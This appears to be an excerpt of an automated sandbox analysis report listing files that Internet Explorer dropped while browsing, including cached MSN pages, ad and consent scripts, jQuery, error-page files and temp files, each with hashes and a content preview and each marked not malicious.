                                        Preview: ......JFIF.............C....................................................................C.......................................................................,.,.."...........................................B............................!.."..1#2A.Qa$B..3q.%R4C...b.5Tr......................................?........................!..1."A.Q.#2a.Bq.....3R....$%C..br..S............?...dF.....k..c.....6f.6...Z9Xl.G.%..%{U\Dc^A.."....M.....`...h..../lhEGv...W......?e.R...."y.P.....a...5.&...v...zGQ...)...s...g.......]...@..v..~[......2.X.h..U.....dE.Z......6O_.8...<.m.[.Q<...7O.........3V..I{....+..y..G.k..{xk.6U.wEV....%...8..H..=....."..7.[..(.U.oQ...RI;...B.!q..#..8..:.Zg{...a...*.........|...@.+^'(..r.l..?.E......>..W..F...r..h.].9.....'.....o6.B..J.x...G.|\E..v.W....E..aQ.';H&'!..V"*...n..rs...?..:.rX.',7.Q...|....x.?..V.E...v+l..p....,q..~.H...G.....W&.y=.....TE.....O(.b.......O."...r..m........j......uk.>).^H..*'._.\...." ..g7..&..=.5W
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\checksync[2].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:dropped
                                        Size (bytes):21628
                                        Entropy (8bit):5.304819777739522
                                        Encrypted:false
                                        SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                        MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                        SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                        SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                        SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\de-ch[1].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                        Category:dropped
                                        Size (bytes):404344
                                        Entropy (8bit):5.44290331784383
                                        Encrypted:false
                                        SSDEEP:3072:6JdNJUexx+FAkJ8dZcaI0vr6emugk7FpbT0Aa52RlLMmLQmkL7IOLh:6JLlOFzV95cJaIE
                                        MD5:FF671B77977C87CC9E1258453D6E1773
                                        SHA1:B5290E931D06B0D205A76D53CD6C7FC268A693B9
                                        SHA-256:11E3DEE4719EF666D914621B7966E278F960833E5638F4AFD654D2840066B674
                                        SHA-512:28AF025B04E7475CC50FD229AB4B3BDCFF174127389AF4E51D7A9416BC0E4662F3B3A1F73660AD89BB76861EE4E4C9489F6D5FB1B8A71F728513B7E8283F2405
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210909_23937236;a:f874d046-3d1c-4bd8-a6f0-98442a1996cd;cn:19;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 19, sn: neurope-prod-hp, dt: 2021-09-02T18:03:34.1645487Z, bt: 2021-09-09T00:14:30.9925819Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-09-10 09:33:17Z;axd:;f:gholdout;userOptOut:false;userOptOutOptions:" data-js="{&quot;dpi&quot;:1.0,&quot;ddpi&quot;:1.0,&quot;dpio&quot;:null,&quot;forcedpi&quot;:null,&quot;dms&quot;:6000,&quot;ps&quot;:1000,&quot;bds&quot;:7,&quot;dg&quot;:&quot;tmx.pc.ms.ie10plus&quot;,&quot;ssl&quot;:true,&quot;moduleapi&quot;:&quot;https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;,&quot;cdnmoduleapi&quot;:&quot;https://static-global-s-msn-com.akamaiz
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dnserror[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2997
                                        Entropy (8bit):4.4885437940628465
                                        Encrypted:false
                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dnserror[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2997
                                        Entropy (8bit):4.4885437940628465
                                        Encrypted:false
                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\down[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):748
                                        Entropy (8bit):7.249606135668305
                                        Encrypted:false
                                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                        MD5:C4F558C4C8B56858F15C09037CD6625A
                                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\errorPageStrings[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):5.164796203267696
                                        Encrypted:false
                                        SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                        MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                        SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                        SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                        SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\httpErrorPagesScripts[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):12105
                                        Entropy (8bit):5.451485481468043
                                        Encrypted:false
                                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                        MD5:9234071287E637F85D721463C488704C
                                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\jquery-2.1.1.min[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):84249
                                        Entropy (8bit):5.369991369254365
                                        Encrypted:false
                                        SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                        MD5:9A094379D98C6458D480AD5A51C4AA27
                                        SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                        SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                        SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\medianet[1].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:dropped
                                        Size (bytes):400969
                                        Entropy (8bit):5.488041062363434
                                        Encrypted:false
                                        SSDEEP:6144:zFDkYqP1vG2jnmuynGJ8nKM03VCuPbrErMrSN9Gm9:A1vFjKnGJ8KMGxT2M+fGm9
                                        MD5:EDE6C188F1260DF0DFDBED997026B418
                                        SHA1:52B34915371CFA021FA9E2FE4E83AE54A921FB00
                                        SHA-256:938AB8528BC6C4B73CDA41E4812874BBD71D713171F9AF19E898E402919C63DA
                                        SHA-512:D2FB4D6242330C2D343B5BAA67314C7FF1A80A5AFD32AE851E0AB30EF6412D87ADC8B842BF8F6F71EAC14820765180F42E31C3F2B34011724ED45CCFF6C220FD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\medianet[2].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:dropped
                                        Size (bytes):400969
                                        Entropy (8bit):5.4880634953561565
                                        Encrypted:false
                                        SSDEEP:6144:zFOkYqP1vG2jnmuynGJ8nKM03VCuPbTErMrSN9Gm9:N1vFjKnGJ8KMGxTuM+fGm9
                                        MD5:880384B9AD307949754F258E8704F224
                                        SHA1:F1DC854A93FDA0E015DDD4E0B03A3276AFF6E27C
                                        SHA-256:3A6CD79D964329F560119A4B8FA37C3E501FF4D2CA014DC119416812051C3FCF
                                        SHA-512:23BC937B1A9F2F1235B61BE55399A95BD0F5DCC46EDE26E0F9BB0F511F7A478E808EA24B92B17B7ABDB34060C042CA62F726E172E56CB872D97BFDED3D19982F
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\otSDKStub[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):16853
                                        Entropy (8bit):5.393243893610489
                                        Encrypted:false
                                        SSDEEP:192:2Qp/7PwSgaXIXbci91iEBadZH8fKR9OcmIQMYOYS7uzdwnBZv7iIHXF2FsT:FRr14FLMdZH8f4wOjawnTvuIHVh
                                        MD5:82566994A83436F3BDD00843109068A7
                                        SHA1:6D28B53651DA278FAE9CFBCEE1B93506A4BCD4A4
                                        SHA-256:450CFBC8F3F760485FBF12B16C2E4E1E9617F5A22354337968DD661D11FFAD1D
                                        SHA-512:1513DCF79F9CD8318109BDFD8BE1AEA4D2AEB4B9C869DAFF135173CC1C4C552C4C50C494088B0CA04B6FB6C208AA323BFE89E9B9DED57083F0E8954970EF8F22
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: var OneTrustStub=function(e){"use strict";var t,o,n,i,a,r,s,l,c,p,u,d,m,h,f,g,b,A,C,v,y,I,S,w,T,L,R,B,D,G,E,P,_,U,k,O,F,V,x,N,H,M,j,K=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}};(o=t=t||{})[o.Unknown=0]="Unknown",o[o.BannerCloseButton=1]="BannerCloseButton",o[o.ConfirmChoiceButton
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\wMhAw[1].avi
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5
                                        Entropy (8bit):2.321928094887362
                                        Encrypted:false
                                        SSDEEP:3:3:3
                                        MD5:5BFA51F3A417B98E7443ECA90FC94703
                                        SHA1:8C015D80B8A23F780BDD215DC842B0F5551F63BD
                                        SHA-256:BEBE2853A3485D1C2E5C5BE4249183E0DDAFF9F87DE71652371700A89D937128
                                        SHA-512:4CD03686254BB28754CBAA635AE1264723E2BE80CE1DD0F78D1AB7AEE72232F5B285F79E488E9C5C49FF343015BD07BB8433D6CEE08AE3CEA8C317303E3AC399
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 0....
                                        C:\Users\user\AppData\Local\Temp\~DF2473ADA049D0983B.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):29989
                                        Entropy (8bit):0.33062985337619266
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwR9lwqc9l2X/9l2v9lN:kBqoxKAuvScS+CkX+iLy
                                        MD5:B6EAE7264912F91A920678372D4B86C8
                                        SHA1:BC81404D5089115FC02C3C4D7EC10AADDD2F8557
                                        SHA-256:06208136441667CDE91AB72BBF8575B474E3F8C188985F0B9B2F00B035FA1C67
                                        SHA-512:773626AD3B0C7B87FAE45DEC96F9B62C98A2F6ED7703A08424A0961F34A54B4C72F7E7956033A33A13B83300DEC582BCFD5AD9E796BDBD2C4C965B156BDCF144
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF4176C87FB657A5E6.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39665
                                        Entropy (8bit):0.5780444584163847
                                        Encrypted:false
                                        SSDEEP:48:kBqoxKAuvScS+1bZIkIkO+7+xoVKmQM+7+xoVKmQc+7+xoVKmQ9:kBqoxKAuvScS+1bZILBGVKwGVKAGVKx
                                        MD5:B3CF81D3D0D000CA9F8F53891A15C827
                                        SHA1:10389D32A8D4D8BFAACA26DE554E39313776EFF6
                                        SHA-256:801EEA6D01716283CC38C3D219BE5EF6DC81A6526027C167293B435AA49B04A8
                                        SHA-512:5339CB9D29AD5409842E0F4D877EE7587B0059177EFA6AD7B964BD6F3B506396FEA1101FEFA9FC1EEE0EC8D3CD31253FC8622DF11F5EA59989FE39F4B888F890
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF4ACD897789E720BD.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39705
                                        Entropy (8bit):0.5861883369520423
                                        Encrypted:false
                                        SSDEEP:192:kBqoxKAuqR+GAazAK+LObtJ+LObt5+LObt+:kBqoxKAuqR+GAazAKfDf7fg
                                        MD5:123BF9F6D10C58BC113F022B9DDCF8AF
                                        SHA1:FB8D4C2DF4D72017A78B527E6323781662CB9A69
                                        SHA-256:CC04FC41BD75CF80AF5023589B819C3A7A77C3202BFE562432EF2949E442B236
                                        SHA-512:EA579A66A1493CD67E50C86A505944CE3EA0E24A2EFED75DA26444A8BFE2FD51EA703D4F2A970A696065127B7008722BC09B9940C1588DB746CE22EAA1EDE5FE
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF4F22D68D37B8EF2E.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):25657
                                        Entropy (8bit):0.3131619969134488
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwg9lwrc9l2r:kBqoxKAuvScS+Ddr
                                        MD5:3BC6461A7D987E6BBABA6C7B132E013E
                                        SHA1:B710E8704BBBDDAAA0BD4901C97784A2936BA4CD
                                        SHA-256:69392CEFC3599C6CAB5FAE509BA3D53851470D8FDF27C617812FBF8A868AB939
                                        SHA-512:BC37EED0122CCF2E5DDE6C8D66BECC4E68E6E088D8FE35B768775E912E23BEE628FAA35D6FE35F4B7317CFBFB9B7BB8A54D24D8FDF628E5A938E00BD09DFF5C7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF5B77DC3D36D1F7D9.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39681
                                        Entropy (8bit):0.5818270151590758
                                        Encrypted:false
                                        SSDEEP:96:kBqoxKAuvScS+EiIZC0EGZ7xqqEGZ7xqSEGZ7xqr:kBqoxKAuqR+EiIZC0L74qL74SL74r
                                        MD5:316A22D7C290C0CB5F90DB175A314E95
                                        SHA1:BC54586E931B7FEC2843ACA3B3A0771A72824C7A
                                        SHA-256:A3FED90B22E13B2EA91372A52611B81707AD619B72F90B12F604293257B11D54
                                        SHA-512:8FD3F4AE27F24A2D54CE5C053FD5BC7137431123A5721797A0B0ECFFA6B7B31BBFFED7FA79612A1B13A1FEDFE16CAE719C9AD9AA0DD476B72B216A54CE352FEA
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF6901BC534DA07F79.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39713
                                        Entropy (8bit):0.5875651256677357
                                        Encrypted:false
                                        SSDEEP:96:kBqoxKAuvScS+HJripLado71ado7Zado7+:kBqoxKAuqR+HJripLadiadaadz
                                        MD5:3C9638C6B86BBF50582D69A1D643B377
                                        SHA1:1A0541FDA03D01A5416295DD86046D3701A627A3
                                        SHA-256:E3DCD6E3C811F3540FB429FA8F3772863AC83F3A44DF66D1EFFCF67ED9402EBC
